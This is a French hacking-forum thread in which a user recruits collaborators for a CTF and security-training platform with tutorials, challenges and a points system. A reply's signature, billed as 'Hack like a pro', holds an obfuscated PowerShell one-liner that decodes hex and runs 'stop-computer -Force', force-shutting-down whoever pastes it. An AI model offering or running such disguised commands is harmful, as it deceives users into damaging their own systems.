Annonce

Réduire
Aucune annonce.

[Recrutement] Forum/Plateforme d'entrainement

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [Recrutement] Forum/Plateforme d'entrainement

    Salut les gars, je viens ici a present afin de vous parler de mon projet , un projet en developement depuis un petit moment.
    Je vous explique le topo :

    Etant ancien fondateur de plusieurs forum , site de hacking une chose me revient souvent et c'est très dommage, les personnes apprennent le hack via internet par le biais de forum ebook vidéo, mais c'est toujours la même chose d'un forum à l'autre beaucoup de gens connaisse de noms les failles , mais ne vont jamais exploiter ou s'entraîner.
    Alors qu'un simple petit effort leur permettrai de progresser plus rapidement, alors que je vois certaine personnes me dire qu'il n'arrive même pas à exploiter une simple fail sql et veulent faire des CTF , mais pourquoi ? pourquoi ne pas s'entrainer jusqu'à reussir , qu'est-ce qui bloque ?
    Les CTF sont vraiment génial dans la compréhension d'outil et de pouvoir résoudre des problemes du à l'environement , cela vous permet de progresser plus vite que de lire simplement le tuto !

    C'est pourquoi (Oui on y vient) J'ai décider de crée un site , une platforme comme root-me enfin a peut prêt c'est du challenge mais le contenu est different.

    Le but étant de stocker les tutoriels sur un forum, (le but sera d'entrainer les gens par ce biais) , permetant aussi de servir de repository pour les teams, des gens pourront venir et choisir un formateur , dans une spécialité puis il y aura les challenges , web etc que créeront les membres, ont aura aussi des CTF , Team contre Team , toutes les activité vous rapporte des points , du moins si vous gagner, les points vous servent a payer un formateur , acheter des tutoriels , obtenir des ressources tel que des scripts , app , dump etc.
    Pouvoir avoir un lab d'entrainement etc voici le plan.

    Voici un peu a quoi cela ressemble sur le papier




    Voila donc je cherche des personnes , qui serait interesser pas que niveau dev savoir si l'idée interesse les personne ou pas ?

    Me MP pour plus d'info

    Edit : la photo upload par le fofo est petite pour voir en meilleurs resolution : https://ibb.co/hL8X0K

  • #2
    Salut,

    Kakashi98, c'est un autre de tes comptes ?

    ++
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire

    Chargement...
    X